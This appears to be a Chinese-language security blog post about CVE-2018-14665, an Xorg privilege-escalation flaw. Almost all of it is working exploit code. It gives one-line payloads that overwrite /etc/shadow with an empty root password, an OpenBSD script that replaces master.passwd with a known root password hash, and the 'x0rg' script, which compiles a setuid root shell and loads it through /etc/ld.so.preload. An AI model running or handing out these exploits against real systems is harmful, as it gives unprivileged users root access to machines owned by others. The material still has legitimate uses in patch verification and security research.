Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

OpenBSD Xorg 服务提权漏洞 (CVE-2018-14665)

wpadmin~October 26, 2018 /InfoSec

OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发(CVE-2018-14665)

基本信息

本地提权 LPE (Local Privilege Escalation, LPE)

OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发 (CVE-2018-14665)
https://twitter.com/hackerfantastic/status/1055517801224396800

PoC / Exp

关键 payload

echo 'cd /etc; Xorg -quiet -fp "root::16431:0:99999:7:::" -keeptty -logfile shadow :1' | sh; su
cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# - https://hacker.house
echo [+] OpenBSD 6.4 stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old 
echo [+] type 'Password1' and hit enter for root
su -

x0rg.sh
https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector. 
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbritary setuid we run to pop root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell

Leave a Reply

Your email address will not be published. Required fields are marked *